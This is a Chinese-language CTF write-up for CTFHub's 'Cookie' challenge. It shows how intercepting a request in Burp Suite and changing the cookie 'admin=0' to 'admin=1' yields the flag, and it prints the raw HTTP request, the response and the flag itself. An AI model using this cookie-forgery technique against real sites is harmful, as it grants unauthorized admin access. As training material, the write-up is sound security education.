Cookie

点击此处获得更好的阅读体验


本WP来自ctfhubug原创投稿

题目考点

  • Cookie欺骗、认证、伪造

解题思路

挂上 BurpSuite 之后访问题目页面,在“代理-HTTP历史”里可以看到两个GET请求

其中第二个GET请求访问http://challenge-7bc25cbdc425c4ea.sandbox.ctfhub.com:10080/favicon.ico

1
2
3
4
5
6
7
8
9
GET /favicon.ico HTTP/1.1
Host: challenge-7bc25cbdc425c4ea.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://challenge-7bc25cbdc425c4ea.sandbox.ctfhub.com:10080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin=0
Connection: close

把这个请求放入“重发器”修改Cookie: admin=0为Cookie: admin=1后发送获得响应页面里包含Flag

1
2
3
4
5
6
7
8
9
10
11
HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 02 Mar 2020 00:30:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.6.40
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Methods: *
Content-Length: 48
ctfhub{5f6a5ebbc9c599b2b1268d0cccb43111049c8364}